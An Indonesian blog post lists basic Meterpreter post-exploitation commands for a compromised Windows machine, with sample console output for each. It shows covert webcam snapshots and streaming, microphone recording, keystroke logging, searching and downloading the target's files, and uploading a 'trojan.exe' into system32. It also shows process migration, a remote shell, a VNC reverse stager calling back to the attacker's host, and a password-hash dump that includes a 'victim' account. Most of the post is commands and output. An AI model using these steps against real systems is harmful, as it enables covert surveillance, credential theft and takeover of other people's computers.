Minggu, Agustus 20, 2017

 Perintah - Perintah dasar Meterpreter Metasploit


 Perintah - Perintah dasar Meterpreter Metasploit

Pada postingan kali ini saya akan membagikan beberapa perintah-perintah yang dapat dijalankan ketika kita sudah mendapatkan sesi meterpreter dari target yang kita exploit.
Kebetulan kemarin ada yang bertanya juga apa yang bisa kita lakukan jika sudah mendapat sesi meterpreter, jika kita tau perintah-perintahnya banyak yang bisa dilakukan, seperti menjalankan program yang ada di sistem target, mengirim file atau mengambil file-file yang ada di sistem target. nah di bawah ini akan saya berikan beberapa contoh perintah - perintah dasar meterpreter di metasploit

help
Perintah ini digunakan untuk melihat semua menu meterpreter

meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter scriptbackground
Perintah ini digunakan untuk mengirimkan sesi meterpreter berjalan sebagai background
meterpreter > background [*] Backgrounding session 1... msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter >

sysinfo
Perintah ini digunakan untuk melihat informasi sistem target

meterpreter > sysinfo Computer : SAMSUNG OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 4 Meterpreter : x86/win32

run vnc

Perintah ini digunakan untuk remote sistem target

meterpreter > run vnc [*] Creating a VNC reverse tcp stager: LHOST=192.168.1.100 LPORT=4545 [*] Running payload handler [*] VNC stager executable 73802 bytes long [*] Uploaded the VNC agent to C:\Users\Samsung\AppData\Local\Temp\sccHTQrAIy.exe (must be deleted manually) [*] Executing the VNC agent with endpoint 192.168.1.100:4545...


webcam_list
Perintah ini digunakan untuk melihat list webcam yang ada

meterpreter > webcam_list 1: ManyCam Virtual Webcam 2: HP Webcam-50 meterpreter > webcam_snap
Perintah ini digunakan untuk mengambil gambar dari webcam

meterpreter > webcam_snap [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/PZegxMLF.jpeg meterpreter >

webcam_stream

Perintah ini digunakan untuk streaming secara langsung dari webcam target

meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: GHqixCls.html [*] Streaming... record_mic
Perintah ini digunkan untuk mengambil rekaman suara dari microphone target, tambahkan opsi -d utuk menentukan interfal

meterpreter > record_mic -d 10 [*] Starting... [*] Stopped Audio saved to: /root/UqxrMpys.wav meterpreter >

run keylogrecorder

Perintah ini digunakan untuk merekam aktifitas keyboard pada sistem target, tekan Ctrl+C untuke berhenti

meterpreter > run keylogrecorder [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.103_20160229.0841.txt [*] Recording ^C[*] Saving last few keystrokes [*] Interrupt [*] Stopping keystroke sniffer... meterpreter >

geteuid
perintah ini digunakan untuk melihat user server yang sedang berjalan
meterpreter > getuid Server username: Samsung\Samsung meterpreter > getsid
Perintah ini digunakan untuk mendapatkan SID dari user server yang sedang berjalan

meterpreter > getsid Server SID: S-1-5-21-341670393-1752858153-726497755-1000 meterpreter >

Search

Perintah untuk mencari sebuah file yang ada di sistem target, gunakan opsi -f untuk mencari file dengan format tertentu

meterpreter > search -f .pdf Found 50 results... C:\Users\Samsung\Documents\CV.PDF (136731 bytes) C:\Users\Samsung\DocumentsHowTo.pdf (570012 bytes) C:\Users\Samsung\Documents\pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf (149072 bytes) C:\Users\Samsung\Documents\TUTORIAL VERIFIKASI PIN ADSENSE.pdf (1170899 bytes)

'pwd' dan 'cd'

pwd digunakan untuk melihat dimana letak kita berada di direktory target, dan cd untuk masuk ke sebuah direktory

meterpreter > pwd C:\ meterpreter > cd Users meterpreter > pwd C:\Users meterpreter > ls 
Sama dengan perintah pada terminal linux, ini digunakan untuk melihat list dari suatu direktory
meterpreter > ls Listing: C:\Users\Samsung\Documents ====================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2016-02-09 17:41:36 +0700 Bluetooth Folder 100666/rw-rw-rw- 136731 fil 2015-11-24 03:55:43 +0700 CV.PDF 100666/rw-rw-rw- 1992 fil 2016-02-03 17:26:41 +0700 Default.rdp 100666/rw-rw-rw- 73216 fil 2016-01-16 17:22:29 +0700 Drawing1 FLOW EGA.vsd 100666/rw-rw-rw- 570012 fil 2015-12-02 17:39:08 +0700 HowTo.pdf 100666/rw-rw-rw- 1170899 fil 2015-12-14 19:50:58 +0700 TUTORIAL VERIFIKASI PIN ADSENSE.pdf 100666/rw-rw-rw- 8251365 fil 2015-11-23 14:11:54 +0700 Untitled.pdf 40777/rwxrwxrwx 0 dir 2015-11-23 11:09:39 +0700 penggajian_Taruna_Karya 100666/rw-rw-rw- 149072 fil 2015-12-06 21:53:04 +0700 pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf 100666/rw-rw-rw- 20505 fil 2016-01-12 14:56:55 +0700 recruitingindo511.docx meterpreter > download
Perintah ini digunakan untuk mengambil file dari sistem target

meterpreter > download Default.rdp /root/Desktop/ [*] downloading: Default.rdp -> /root/Desktop/Default.rdp [*] download : Default.rdp -> /root/Desktop/Default.rdp meterpreter >

/root/Desktop merupakan letak dimana file akan disimpan

upload

Perintah ini digunakan untuk mengirim sebuah file ke sistem target, dengan direktory yang ditetukan

meterpreter > upload trojan.exe c:\\windows\\system32 [*] uploading : trojan.exe -> c:\windows\system32 [*] uploaded : trojan.exe -> c:\windows\system32\trojan.exe meterpreter > 

cat
Sama seperti perintah umumnya pada linux, ini digunakan untuk menampilkan isi dari sebuah file 
meterpreter > cat Usage: cat file meterpreter > cat Anherr.txt Perintah Perintah dasar Meterpreter by Anherr Blog's meterpreter > mkdir

Perintah ini digunakan untuk membuat sebuah folder

meterpreter > mkdir Anherr Creating directory: Anherr meterpreter >  

Kita juga dapat menggunkan peritah 
cp untuk mengcopy file
rm untuk menghapus file
rmdir untuk menghapus suatu direktory 

ipconfig
Perintah ini digunakan untuk meliha ip target secara keseluruhan

meterpreter > ipconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11 ============ Name : Qualcomm Atheros AR9485 802.11b/g/n WiFi Adapter Hardware MAC : 55:7d:68:15:dd:ef MTU : 1500 IPv4 Address : 192.168.1.103 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::cdb0:307a:4cdc:71e4 IPv6 Netmask : ffff:ffff:ffff:ffff::

netstat

Perintah ini digunakan untuk menampilkan koneklsi jaringan pada sistem target

meterpreter > netstat Connection list =============== Proto Local address Remote address State User Inode PID/Program name ----- ------------- -------------- ----- ---- ----- ---------------- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 808/svchost.exe tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 480/wininit.exe tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 904/svchost.exe tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 984/svchost.exe tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 608/services.exeps
Perintah ini digunakan untuk meliha list prosses yang sedang berjalan pada target

meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System 276 smss.exe 376 Ath_CoexAgent.exe 2968 taskhost.exe x86 1 Samsung\Samsung C:\Windows\system32\taskhost.exe 2976 dwm.exe x86 1 Samsung\Samsung C:\Windows\system32\Dwm.exe 3024 explorer.exe x86 1 Samsung\Samsung C:\Windows\Explorer.EXE

migrate

Perintah ini digunakan untuk berpindah ke prosses yang lain

meterpreter > migrate 3024 [*] Migrating from 1192 to 3024... [*] Migration completed successfully. meterpreter >

execute

Perintah untuk mengeksekusi, contoh untuk menjalankan cmd.exe

meterpreter > execute -f cmd.exe Process 316 created. meterpreter >

shell

Perintah ini digunakan untuk mendapatkan shell dari sistem target, layaknya Command Prompt

meterpreter > shell Process 3456 created. Channel 3 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>

hashdump

Perintah ini digunakan untuk dump database SAM

meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\>

Itulah beberapa contoh dari perintah-perintah meterpreter di metasploit, sebetulnya masih ada lagi namun akan banyak jika ditulis semua, hehe , silahkan ketik help pada meterpreter untuk melihat semua list yang ada
Cukup itu dulu yang dapat saya bagikan kali ini , semoga bermanfaat

sumber www.offensive-security.com

...